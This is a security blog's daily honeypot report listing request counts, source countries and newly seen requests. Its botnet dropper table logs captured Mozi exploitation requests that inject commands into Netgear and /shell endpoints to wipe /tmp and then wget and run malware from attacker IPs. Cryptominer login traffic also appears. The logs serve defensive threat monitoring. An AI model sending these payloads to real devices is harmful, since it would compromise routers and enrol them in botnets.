Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-01

·345 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-01
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 10 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3619 requests were recorded during the day, originating from 5 different countries, with a peak of 2692 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
JPGermany
USGermany
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
124.131.137.180GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://124.131.137.180:49285/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
59.96.136.212GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.96.136.212:42274/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
59.97.251.239GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.97.251.239:36473/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
70.93.160.137GET /shell?cd+/tmp;rm+-rf+*;wget+http://70.93.160.137:47151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
157.245.189.92GET /shell?cd+/tmp;rm+-rf+*;wget+http://70.93.160.137:47151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
762GET /relogin.rsp HTTP/1.1
10401GET HTTP/1.1 HTTP/1.1
10641\x00\x0E8\x0Bs\xC5\xA3bO\xE4\xC4\x00\x00\x00\x00\x00
10741{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xc6a54e2561cbf4beb2c1f8239a04a6a34c9ad8b1\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
10751{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2244HMW9DLQmCGg3yT8DNDwVUUkb4Nq92pb8vviaTCtFqM6aezn65KFCghuXnurvrAcLfnftm2VDpuUCQkjNF7QEqCAZt4MS9\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
10901\x00\x0E8\xF6\x86\xA7\x8C\xA8\xEE\xAE\xF4\x00\x00\x00\x00\x00
11111\x00\x0E8\x14\xB4]9$\xC5Y\x8F\x00\x00\x00\x00\x00
11341\x00\x0E8q\xE7JP\xDA\x7F\x8F\x0E\x00\x00\x00\x00\x00
11941GET /phpmyadmin4.8.5/index.php HTTP/1.1
12031POST /json_rpc HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
02692GB
1206US
2138BG
3104CN
484JP
563NL
650DE
740ES
838FR
925PL
1016IN
1116GH
1214SC
1313CH
1413AU
159CA
168IL
178BR
187HK
197UA
206RO
216RU
226LT
235ZA
245IR
255BE
265NG
274KR
284AO
294MN
303PT
312MC
322IE
332KW
342KZ
352VN
362ID
371EE
381TR
391SG

Related

Report: 2025-05-31
·303 words
Repport Daily
Report: 2025-05-30
·323 words
Repport Daily
Report: 2025-05-29
·6066 words
Repport Daily